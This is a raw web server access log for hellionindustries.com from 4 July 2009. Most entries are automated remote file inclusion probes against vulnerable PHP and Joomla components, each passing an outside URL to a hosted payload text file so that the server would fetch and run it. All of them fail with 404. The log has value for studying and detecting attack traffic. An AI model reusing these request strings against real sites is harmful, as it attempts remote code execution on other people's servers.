67.208.139.72 - - [04/Jul/2009:09:39:11 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
125.251.147.130 - - [04/Jul/2009:09:39:46 -0700] "GET /logs/access.log/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "hellionindustries.com"
125.251.147.130 - - [04/Jul/2009:09:39:46 -0700] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "hellionindustries.com"
125.251.147.130 - - [04/Jul/2009:09:39:46 -0700] "GET /logs/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:09:42:30 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:09:42:32 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
203.63.5.148 - - [04/Jul/2009:09:44:58 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
203.63.5.148 - - [04/Jul/2009:09:44:58 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
203.63.5.148 - - [04/Jul/2009:09:45:04 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
203.63.5.148 - - [04/Jul/2009:09:45:05 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
203.63.5.148 - - [04/Jul/2009:09:45:06 -0700] "GET /logs/access_090521.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
203.63.5.148 - - [04/Jul/2009:09:45:12 -0700] "GET /logs/access_090521.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
77.221.130.17 - - [04/Jul/2009:09:47:20 -0700] "GET /standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.keycallback-store.com//images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
77.221.130.17 - - [04/Jul/2009:09:47:20 -0700] "GET /logs/access.log//standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.keycallback-store.com//images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
77.221.130.17 - - [04/Jul/2009:09:47:20 -0700] "GET /logs//standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.keycallback-store.com//images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
203.63.5.148 - - [04/Jul/2009:09:47:36 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
203.63.5.148 - - [04/Jul/2009:09:47:36 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
203.63.5.148 - - [04/Jul/2009:09:47:36 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
203.63.5.148 - - [04/Jul/2009:09:47:40 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
203.63.5.148 - - [04/Jul/2009:09:47:41 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
203.63.5.148 - - [04/Jul/2009:09:47:41 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:09:48:21 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:09:48:21 -0700] "GET /logs/access.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:09:48:21 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
77.221.130.17 - - [04/Jul/2009:09:49:53 -0700] "GET /logs/access.log%20%20//standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.keycallback-store.com//images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:09:49:57 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:09:49:57 -0700] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:09:49:57 -0700] "GET /logs/access.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:09:50:26 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:09:50:26 -0700] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:09:50:27 -0700] "GET /logs/access.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:09:50:30 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:09:50:30 -0700] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:09:50:30 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
203.63.5.148 - - [04/Jul/2009:09:57:10 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
203.63.5.148 - - [04/Jul/2009:09:57:17 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.137.160.12 - - [04/Jul/2009:09:57:47 -0700] "GET /logs/access.log%20%20/errors.php?error=http://www.dbmoptics.com/glossary///fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.137.160.12 - - [04/Jul/2009:09:57:47 -0700] "GET /logs/errors.php?error=http://www.dbmoptics.com/glossary///fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.137.160.12 - - [04/Jul/2009:09:57:47 -0700] "GET /errors.php?error=http://www.dbmoptics.com/glossary///fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:09:58:38 -0700] "GET /config/dbutil.bck.php?confdir=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:09:58:38 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:09:58:38 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:09:58:55 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:09:58:55 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:09:58:57 -0700] "GET /config/dbutil.bck.php?confdir=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:09:59:05 -0700] "GET /config/dbutil.bck.php?confdir=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:09:59:07 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:09:59:07 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:10:02:28 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:10:02:28 -0700] "GET /config/dbutil.bck.php?confdir=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:10:02:28 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.137.160.12 - - [04/Jul/2009:10:02:46 -0700] "GET /logs/access.log/errors.php?error=http://www.dbmoptics.com/glossary///fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
114.200.199.144 - - [04/Jul/2009:10:04:04 -0700] "GET /logs/access.log%20%20/errors.php?error=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
114.200.199.144 - - [04/Jul/2009:10:04:04 -0700] "GET /errors.php?error=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
114.200.199.144 - - [04/Jul/2009:10:04:04 -0700] "GET /logs/errors.php?error=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:10:04:13 -0700] "GET /config/dbutil.bck.php?confdir=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:10:04:14 -0700] "GET /logs/access.log%20%20//config/dbutil.bck.php?confdir=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:10:04:15 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:10:08:11 -0700] "GET /logs/access_090521.log%20%20//config/dbutil.bck.php?confdir=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
114.200.199.144 - - [04/Jul/2009:10:09:02 -0700] "GET /logs/access.log/errors.php?error=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
69.159.193.250 - - [04/Jul/2009:10:09:28 -0700] "HEAD / HTTP/1.1" 200 0 "-" "LWP::Simple/5.814" "www.hellionindustries.com"
69.159.193.250 - - [04/Jul/2009:10:09:28 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.8) Gecko/20061025 Firefox/1.5.0.8" "www.hellionindustries.com"
69.159.193.250 - - [04/Jul/2009:10:09:28 -0700] "GET / HTTP/1.1" 200 779 "-" "libwww-perl/5.814" "www.hellionindustries.com"
69.159.193.250 - - [04/Jul/2009:10:09:29 -0700] "GET /home.htm HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.hellionindustries.com"
69.159.193.250 - - [04/Jul/2009:10:09:29 -0700] "GET /home.html HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.hellionindustries.com"
69.159.193.250 - - [04/Jul/2009:10:09:29 -0700] "GET /contact.htm HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.hellionindustries.com"
69.159.193.250 - - [04/Jul/2009:10:09:29 -0700] "GET /contacts.htm HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.hellionindustries.com"
69.159.193.250 - - [04/Jul/2009:10:09:29 -0700] "GET /contacts.html HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.hellionindustries.com"
69.159.193.250 - - [04/Jul/2009:10:09:30 -0700] "GET /contactus.html HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.hellionindustries.com"
69.159.193.250 - - [04/Jul/2009:10:09:30 -0700] "GET /contactus.htm HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.hellionindustries.com"
69.159.193.250 - - [04/Jul/2009:10:09:30 -0700] "GET /contact.html HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.hellionindustries.com"
69.159.193.250 - - [04/Jul/2009:10:09:30 -0700] "GET /index.html HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.hellionindustries.com"
69.159.193.250 - - [04/Jul/2009:10:09:30 -0700] "GET /index.htm HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.hellionindustries.com"
69.159.193.250 - - [04/Jul/2009:10:09:30 -0700] "GET /welcome.html HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.hellionindustries.com"
69.159.193.250 - - [04/Jul/2009:10:09:31 -0700] "GET /welcome.htm HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.hellionindustries.com"
69.159.193.250 - - [04/Jul/2009:10:09:31 -0700] "GET /locations.htm HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.hellionindustries.com"
69.159.193.250 - - [04/Jul/2009:10:09:31 -0700] "GET /locations.html HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.hellionindustries.com"
69.159.193.250 - - [04/Jul/2009:10:09:31 -0700] "GET /locations.php HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.hellionindustries.com"
69.159.193.250 - - [04/Jul/2009:10:09:31 -0700] "GET /index.php HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:10:11:32 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:10:11:32 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:10:11:32 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:10:11:42 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:10:11:42 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:10:11:42 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:10:14:56 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:10:15:00 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:10:15:13 -0700] "GET /htmltonuke.php?filnavn=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:10:15:13 -0700] "GET /logs/access.log/htmltonuke.php?filnavn=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:10:15:13 -0700] "GET /logs/htmltonuke.php?filnavn=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:10:15:59 -0700] "GET /logs/access.log%20%20/htmltonuke.php?filnavn=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:10:15:59 -0700] "GET /logs/htmltonuke.php?filnavn=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:10:15:59 -0700] "GET /htmltonuke.php?filnavn=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
203.63.5.148 - - [04/Jul/2009:10:17:16 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
203.63.5.148 - - [04/Jul/2009:10:17:16 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
203.63.5.148 - - [04/Jul/2009:10:17:17 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
203.63.5.148 - - [04/Jul/2009:10:17:36 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
203.63.5.148 - - [04/Jul/2009:10:17:36 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
203.63.5.148 - - [04/Jul/2009:10:17:38 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:10:20:03 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:10:20:03 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:10:20:03 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:10:20:03 -0700] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:10:20:03 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:10:20:04 -0700] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:10:20:11 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
